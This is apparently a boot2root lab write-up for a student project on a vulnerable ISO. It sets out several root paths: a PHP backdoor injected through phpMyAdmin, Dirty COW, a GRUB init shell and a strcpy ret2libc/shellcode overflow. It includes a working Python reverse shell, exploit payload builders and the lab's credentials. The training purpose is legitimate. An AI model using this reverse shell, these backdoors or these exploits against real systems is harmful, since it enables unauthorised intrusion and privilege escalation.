Summary: This project is an introduction to penetrating a system.
After all your efforts you will finally get to have some fun! This project is a starting point to make you understand how to go about penetrating a system on which you legally hold the rights. I strongly encourage you to use every available method to really break this ISO. The correction will be limited, but your ability to exploit your ISO will be greatly rewarded, especially beyond your grade.
We have to find 2 exploit methods to validate the mandatory part; each additional valid method counts as 1 bonus.
- Find the server ip, scan local network -> nmap
- 192.168.1.22
- Port scan on the server -> nmap
- http
- https
- ftp
- ssh
- List the https directories and pages -> dirb
- Forum login -> credentials found in a forum post: lmezard / q\]Ej?*5K5cy*AJ
- Webmail login -> mail found in the forum user space: laurie@borntosec.net / q\]Ej?*5K5cy*AJ
- PhpMyAdmin login -> credentials found in a mail: root / Fg-'kKXBj87E:aJ$
- Inject a PHP backdoor page into the forum to execute commands -> PhpMyAdmin SQL request
  https://192.168.1.22/forum/templates_c/backdoor.php
- Inject a python reverse shell -> backdoor on the guest + netcat on the host
  - shell on the server as user www-data
- List the kernel version + list popular vulnerabilities for it
  - Dirty COW (CVE-2016-5195)
- Upload a custom Dirty COW exploit + compile + run
  - root user with the new password easywin
Steps 8 to 10 (python reverse shell through Dirty COW) are automated with the script dirtycow.py
ROOT! 🏁
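The "backdoor on the guest + netcat on the host" step above, as an added example that is not the project's own reverse_shell.py: the guest side connects back and runs each received line as a shell command, and a small `Listener` class stands in for `nc -lvp PORT` so the exchange can be run end to end over loopback. Host, port and the command list are constructed for the demo; the timeouts are the one thing a real callback is usually missing, and they are what keeps a dead listener from hanging the guest.

```python
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int, timeout: float = 10.0) -> int:
    """Guest side (what the PHP backdoor would launch on the server): connect back
    to host:port, run every line received as a shell command and send stdout and
    stderr back. Stops on 'exit' or when the listener hangs up. Returns the
    number of commands executed."""
    executed = 0
    # The timeout covers connect() and every read, so a dead listener cannot
    # leave the process hanging forever.
    with socket.create_connection((host, port), timeout=timeout) as sock, \
            sock.makefile("rb") as commands:
        for raw in commands:
            cmd = raw.decode("utf-8", "replace").strip()
            if cmd == "exit":
                break
            if not cmd:
                continue
            result = subprocess.run(cmd, shell=True, capture_output=True, timeout=timeout)
            sock.sendall(result.stdout + result.stderr)
            executed += 1
    return executed


class Listener:
    """Host side, a stand-in for `nc -lvp PORT`: accepts one connection, sends the
    queued commands and collects everything the guest returns until it closes."""

    def __init__(self, commands, host: str = "127.0.0.1", timeout: float = 10.0):
        self.commands = list(commands)
        self.output = b""
        self.timeout = timeout
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind((host, 0))          # port 0: let the OS pick a free port
        self.server.listen(1)
        self.server.settimeout(timeout)
        self.port = self.server.getsockname()[1]
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self) -> None:
        conn, _ = self.server.accept()
        self.server.close()
        with conn:
            conn.settimeout(self.timeout)
            conn.sendall("".join(c + "\n" for c in self.commands).encode())
            chunks = []
            while True:
                chunk = conn.recv(65536)
                if not chunk:                # guest closed: it processed 'exit'
                    break
                chunks.append(chunk)
            self.output = b"".join(chunks)


def local_demo(commands=("echo boot2root", "id", "exit")):
    """Run guest and host in one process over loopback (constructed demo input);
    returns (commands executed, bytes the listener collected)."""
    listener = Listener(commands)
    executed = reverse_shell("127.0.0.1", listener.port)
    listener.thread.join(listener.timeout)
    return executed, listener.output


if __name__ == "__main__":
    n, out = local_demo()
    print(f"{n} commands executed, output:\n{out.decode(errors='replace')}")
```

On the real target the guest side is what gets dropped through the PHP backdoor and pointed at the attacker's IP; the listener is replaced by netcat, and the shell that comes back runs as www-data, exactly as the step above says.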
Starting at the 1st solution point 8 (python reverse shell)
- Inject a python reverse shell -> backdoor on the guest + netcat on the host (or the script reverse_shell.py)
  - shell on the server as user www-data
- FTP login -> credentials found in /home/LOOKATME: lmezard / G!@M6f4Eatau{sF"
  - files README and fun
- Extract the fun tar archive -> tar xvf
  - many pcap files in the directory ft_fun
- Add all the pcap files, in the right order, to a single C file and compile it -> pcap_files_to_c.py + gcc
  - the program prints a password
- SSH connection -> user from the README and the SHA256 of the password: laurie / 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4
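The "add all the pcap files in the right order" step, as an added example that is not the project's pcap_files_to_c.py: it assumes each .pcap file is really a text fragment of one C program that ends with a marker comment of the form `//file<N>` giving its position (the marker format is an assumption for this example, the page only says the files must be ordered), reassembles them by the numeric value of N rather than by file name (so file10 does not sort before file2), and hashes the printed password the way the SSH step uses it. The fragments are constructed sample input.

```python
import hashlib
import re
from typing import Dict, List, Tuple

# Assumed fragment layout: every .pcap file is a text chunk of one C program,
# and each chunk ends with a comment like "//file42" giving its position.
MARKER = re.compile(r"//file(\d+)\s*$")


def fragment_index(text: str) -> int:
    """Return the numeric position encoded in a fragment's trailing marker."""
    m = MARKER.search(text.rstrip())
    if m is None:
        raise ValueError("fragment has no //file<N> marker")
    return int(m.group(1))


def reassemble(fragments: Dict[str, str]) -> Tuple[str, List[str]]:
    """Order the fragments by their numeric marker (NOT by file name, which
    would sort file10 before file2), strip the markers and join them into one
    C source. Returns (source, file names in the order used)."""
    ordered = sorted(fragments.items(), key=lambda kv: fragment_index(kv[1]))
    names = [name for name, _ in ordered]
    source = "".join(MARKER.sub("", text).rstrip() + "\n" for _, text in ordered)
    return source, names


def sha256_hex(password: str) -> str:
    """The SSH password is the SHA-256 hex digest of the string the program prints."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed sample input: three shuffled fragments of a tiny program whose
# names deliberately sort in the wrong order.
SAMPLE_FRAGMENTS = {
    "zzz.pcap": "int main(void) {\n//file1\n",
    "aaa.pcap": "#include <stdio.h>\n//file0\n",
    "mmm.pcap": '    printf("%s\\n", "password");\n    return 0;\n}\n//file2\n',
}


if __name__ == "__main__":
    src, order = reassemble(SAMPLE_FRAGMENTS)
    print("order:", order)
    print(src)
    # the real step then runs: gcc -o fun fun.c && ./fun, and hashes the output
    print(sha256_hex("password"))
```

With hundreds of fragments the numeric sort is the whole point: a plain `sort` or `ls` ordering of the file names produces a C file that does not compile, which is the first thing to check when gcc complains about the reassembled source.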
- Inspect laurie's home
  - files README and bomb
- Reverse the binary bomb in laurie's home -> gdb or Ghidra
  - all files and exploit scripts are in the laurie directory
  - a password
- User login thor -> user from the README and the found password (warning: subject error): thor / Publicspeakingisveryeasy.126241207201b2149opekmq426135
- Inspect thor's home
  - files README and turtle
- Reproduce the turtle instructions with a python script -> thor/turtle.py
  - word: SLASH
- User login zaz -> user from the README and the MD5 of the found word: zaz / 646da671ca01bb5d84dbb5fb2238dc8e
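The turtle step and the zaz login, as one added example that is not the project's thor/turtle.py: a small interpreter that executes turtle instructions letter by letter and renders each letter as ASCII so the word can be read off, plus the MD5 step that turns the word into the zaz password. It assumes the instruction file uses lines of the form `Avance N spaces`, `Recule N spaces`, `Tourne gauche de N degrees` and `Tourne droite de N degrees`, with blank lines separating the letters; that format is an assumption for the example, not something the page states. The sample instructions are constructed and draw an "L" and a mirrored "L".

```python
import hashlib
import math
import re
from typing import Iterable, List, Set, Tuple

# Assumed instruction format (one instruction per line, blank line between letters):
#   "Avance 170 spaces" / "Recule 100 spaces"
#   "Tourne gauche de 90 degrees" / "Tourne droite de 90 degrees"
INSTRUCTION = re.compile(r"^(Avance|Recule|Tourne gauche de|Tourne droite de)\s+(\d+)")


def trace_letter(lines: Iterable[str]) -> Set[Tuple[int, int]]:
    """Execute one letter's instructions from (0, 0) heading east (y grows
    upwards) and return the set of integer cells the pen passed over."""
    x = y = 0.0
    heading = 0.0                      # degrees, counter-clockwise from +x
    cells = {(0, 0)}
    for line in lines:
        m = INSTRUCTION.match(line.strip())
        if not m:
            continue                   # blank or unknown line
        verb, amount = m.group(1), int(m.group(2))
        if verb == "Tourne gauche de":
            heading += amount
        elif verb == "Tourne droite de":
            heading -= amount
        else:
            sign = 1 if verb == "Avance" else -1
            rad = math.radians(heading)
            nx = x + sign * amount * math.cos(rad)
            ny = y + sign * amount * math.sin(rad)
            # rasterise the stroke: one sample per unit of length
            for i in range(amount + 1):
                t = i / amount if amount else 1.0
                cells.add((round(x + (nx - x) * t), round(y + (ny - y) * t)))
            x, y = nx, ny
    return cells


def render(cells: Set[Tuple[int, int]], scale: int = 1) -> List[str]:
    """ASCII picture of the cells, top row first. `scale` divides the
    coordinates so 170-unit strokes still fit on a terminal."""
    pts = {(cx // scale, cy // scale) for cx, cy in cells}
    xs = [p[0] for p in pts]
    ys = [p[1] for p in pts]
    return ["".join("#" if (xx, yy) in pts else "." for xx in range(min(xs), max(xs) + 1))
            for yy in range(max(ys), min(ys) - 1, -1)]


def split_letters(text: str) -> List[List[str]]:
    """Blank lines separate the letters."""
    return [block.splitlines() for block in re.split(r"\n\s*\n", text.strip()) if block.strip()]


def md5_hex(word: str) -> str:
    """The zaz password is the MD5 hex digest of the word the drawing spells."""
    return hashlib.md5(word.encode()).hexdigest()


# Constructed sample: an "L", then a mirrored "L".
SAMPLE = """Tourne gauche de 90 degrees
Avance 4 spaces
Recule 4 spaces
Tourne droite de 90 degrees
Avance 3 spaces

Avance 2 spaces
Tourne gauche de 90 degrees
Avance 2 spaces
"""


if __name__ == "__main__":
    for letter in split_letters(SAMPLE):
        print("\n".join(render(trace_letter(letter))), end="\n\n")
    print(md5_hex("SLASH"))
```

Rendering each letter separately is what makes the word readable: drawn on one canvas the letters overlap, because every block starts again from the origin.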
- Inspect zaz's home
  - binary file exploit_me with root suid
- Exploit the binary's strcpy overflow -> gdb + ret2libc method -> zaz/exploit.py
  - root shell
- (Optional) Add a backdoor binary to easily open a root shell from a zaz ssh session
Steps 21 to 22 (exploiting exploit_me) are automated with the script zaz/exploit.py
ROOT! 🏁
- At boot, spam Shift to access the GRUB boot menu
- List the boot entries with Tab -> live
- Enter live init=/bin/bash
- root shell
- List the iso files -> script ls_iso.py
  - the file filesystem.squashfs contains the filesystem
- Extract the file /root/.bash_history from the filesystem -> extract_file_iso.py
  - root's .bash_history
- Get the zaz password from it -> read_bash_history.py: 646da671ca01bb5d84dbb5fb2238dc8e
- zaz ssh
Continue at the 2nd solution point 20 (zaz's home)
Starting at the 1st solution point 7 (PHP backdoor page)
- Inject a PHP exec page into the forum to execute commands -> PhpMyAdmin SQL request
  https://192.168.1.22/forum/templates_c/backdoor.php
  - a new page paths.php
- Navigate the directory /home/LOOKATME/password -> paths.php
  - FTP credentials: lmezard / G!@M6f4Eatau{sF"
Continue at the 2nd solution point 9 (FTP login)
Using another Dirty COW exploit: c0w.c
Starting at the 1st solution point 10 (Dirty COW)
- Upload the custom Dirty COW exploit + compile + run -> c0w.py
  - /usr/bin/passwd is now a backdoor that spawns a root shell
All steps are automated with the script c0w.py
Starting at the 1st solution point 10 (Dirty COW)
- Upload the custom Dirty COW exploit + compile + run
  - root user with the new password easywin
- Upload the custom PHP page p0wny-shell.php
  - PHP page shell.php on the forum with a shell
- Create a binary exec_cmd in the PATH with root suid to execute commands
  - exec_cmd backdoor binary
- Go to /forum/templates_c/shell.php
  - backdoor page with a root shell
All steps are automated with the script dirtycow_p0wny.py
Starting at the 2nd solution point 20 (zaz's home)
- Exploit the binary's strcpy overflow -> gdb + shellcode method
  - root shell
- (Optional) Add a backdoor binary to easily open a root shell from a zaz ssh session
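The two ways of exploiting the exploit_me strcpy overflow (ret2libc in the 2nd solution, shellcode in the variant just above), as one added example that is not the project's zaz/exploit.py: the two payload builders differ only in what is placed at the saved return address. The offset to the return address and the libc/stack addresses are hypothetical values standing in for what gdb gives on the target, the binary is assumed to be 32-bit (hence the 4-byte little-endian packing), and the shellcode is a constructed `int3` placeholder where a real execve("/bin/sh") stub would go. Both builders refuse payloads containing a NUL byte, because strcpy() stops copying at the first one.

```python
import struct
from typing import Optional


def p32(addr: int) -> bytes:
    """Pack a 32-bit little-endian address (exploit_me is assumed to be 32-bit)."""
    return struct.pack("<I", addr)


def first_nul(payload: bytes) -> int:
    """strcpy() stops at the first NUL byte, so anything after one never lands
    on the stack. Returns its index, or -1 if the payload is NUL-free."""
    return payload.find(b"\x00")


def _check_strcpy(payload: bytes) -> bytes:
    nul = first_nul(payload)
    if nul != -1:
        raise ValueError(f"NUL byte at offset {nul}: strcpy would truncate the payload there")
    return payload


def build_ret2libc_payload(offset: int, system_addr: int, exit_addr: int,
                           binsh_addr: int) -> bytes:
    """ret2libc layout after the saved return address is reached:
       [ padding ][ &system ][ &exit ][ &"/bin/sh" ]
    system() returns into exit() so the process dies cleanly, and reads its
    argument from the next slot, exactly as if it had been called normally."""
    payload = b"A" * offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)
    return _check_strcpy(payload)


def build_shellcode_payload(offset: int, ret_addr: int, shellcode: bytes,
                            nop: bytes = b"\x90") -> bytes:
    """Shellcode layout: a NOP sled fills the buffer up to the shellcode, and
    the saved return address is pointed back into the sled so small errors in
    the guessed stack address still land on a NOP that slides into the code."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit below the return address")
    payload = nop * (offset - len(shellcode)) + shellcode + p32(ret_addr)
    return _check_strcpy(payload)


# Hypothetical values standing in for gdb output on the target (constructed).
OFFSET = 80
SYSTEM_ADDR = 0xB7E6B060
EXIT_ADDR = 0xB7E5EBE0
BINSH_ADDR = 0xB7F8CC58
STACK_ADDR = 0xBFFFF5A0
PLACEHOLDER_SHELLCODE = b"\xcc" * 8     # int3 x8, not a real shell-spawning stub


def describe(payload: bytes, offset: int) -> dict:
    """Split a payload into the parts that matter when debugging it in gdb."""
    return {
        "padding": payload[:offset],
        "saved_ret": payload[offset:offset + 4],
        "rest": payload[offset + 4:],
        "length": len(payload),
    }


if __name__ == "__main__":
    ret2libc = build_ret2libc_payload(OFFSET, SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)
    sc = build_shellcode_payload(OFFSET, STACK_ADDR, PLACEHOLDER_SHELLCODE)
    for name, pl in (("ret2libc", ret2libc), ("shellcode", sc)):
        d = describe(pl, OFFSET)
        print(name, d["length"], d["saved_ret"].hex(), d["rest"].hex())
    # on the target the payload is passed as the argument: ./exploit_me "$(python3 exploit.py)"
```

The NUL check matters more than it looks: a system() address in a libc mapped at 0x08..., or any stack address with a zero byte, silently truncates the argument and the binary just returns, which is the usual reason a payload that is correct in gdb does nothing outside it.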
- https://github.com/diego-treitos/linux-smart-enumeration
- https://github.com/jondonas/linux-exploit-suggester-2
- https://github.com/rebootuser/LinEnum
- https://book.hacktricks.xyz/linux-unix/privilege-escalation
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS